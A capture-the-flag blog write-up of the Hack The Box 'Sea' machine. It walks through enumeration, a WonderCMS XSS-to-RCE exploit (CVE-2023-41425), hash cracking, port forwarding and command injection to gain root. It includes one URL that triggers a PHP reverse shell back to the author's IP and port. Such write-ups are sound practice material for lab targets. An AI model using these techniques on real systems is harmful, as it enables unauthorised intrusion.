HTB-Sea – Season 6 Writeup
Posted inCTFWriteup

HTB-Sea – Season 6 Writeup

No Comments

This was a fun box focussing around CVE-2023-41425 and WonderCMS,

Enumeration

The initial scan with nmap and rustscan revealed two open ports:

  • Port 22: Running OpenSSH 8.2p1 (Ubuntu).
  • Port 80: Hosting an Apache 2.4.41 web server.

Since OpenSSH was up-to-date, I decided to focus on the web server for potential entry points. Brute-forcing SSH credentials seemed risky due to potential rate-limiting, so I shifted my attention to port 80.

Website Exploration

Directory Enumeration

Using tools like dirsearch and gobuster, I discovered several directories:

  • /themes/
  • /messages/
  • /plugins/
  • /home

However, I realized that many of these directories were also visible in the website’s source code, along with additional pages like /contact.php.

Manual Inspection

After testing for common vulnerabilities like XSS and SSRF on the contact form without success, I turned my attention to the /themes/ directory.

Foothold

Discovering WonderCMS

In the /themes/bike/ directory, I found two key files:

  • README.md: Described the “bike” theme for WonderCMS.
  • version: Revealed the CMS version as 3.2.0.

This confirmed the site was running WonderCMS, which I knew had known vulnerabilities.

Exploitation

Researching Vulnerabilities

A quick search revealed that WonderCMS 3.2.0 was vulnerable to an authenticated Remote Code Execution (RCE). However, I didn’t have admin credentials, so I looked for an unauthenticated exploit.

I found an article detailing a Cross-Site Scripting (XSS) vulnerability that could lead to RCE. The exploit involved:

  1. Generating a malicious xss.js file containing a PHP reverse shell.
  2. Sending a crafted URL to the target to trigger the XSS.
  3. Waiting for an admin to interact with the malicious link, which would execute the reverse shell.

Triggering the Exploit

After setting up the exploit, I navigated to the following URL to trigger the RCE:

Copy

http://sea.htb/themes/revshell-main/rev.php?lhost=10.10.14.132&lport=1234

This granted me a shell as www-data.

Privilege Escalation

Enumerating Users

Checking /etc/passwd, I found three users with login shells:

  • root
  • amay
  • geo

Cracking the Hash

In the /var/www/sea/ directory, I discovered a database.js file containing a bcrypt hash. Using hashcat, I cracked the hash to reveal the password for the amay user.

Accessing amay

With the credentials:

  • Usernameamay
  • Password<REDACTED>

I gained SSH access to the machine as amay.

Pivoting to Root

Discovering Internal Services

While enumerating, I noticed two services running locally:

  • Port 8080: A web-based system management tool.
  • Port 34337: Another HTTP service.

Port Forwarding

I forwarded port 8080 to my local machine to inspect it further. The service required authentication, but I used amay‘s credentials to log in.

Exploiting Command Injection

The “Analyze Logs” feature on the internal service was vulnerable to command injection. By injecting commands into the log_file parameter, I executed a reverse shell as root.

Conclusion

This challenge was a great exercise in web application exploitation and privilege escalation. Key takeaways:

  1. Always Check for Known Vulnerabilities: The XSS-to-RCE exploit was the key to initial access.
  2. Lateral Movement is Crucial: Cracking the admin hash allowed me to pivot to amay.
  3. Command Injection is Powerful: A simple injection in the internal service led to root access.

Thanks for reading, and happy hacking!

Tags:

Comments

No comments yet. Why don’t you start the discussion?

Leave a Reply

Your email address will not be published. Required fields are marked *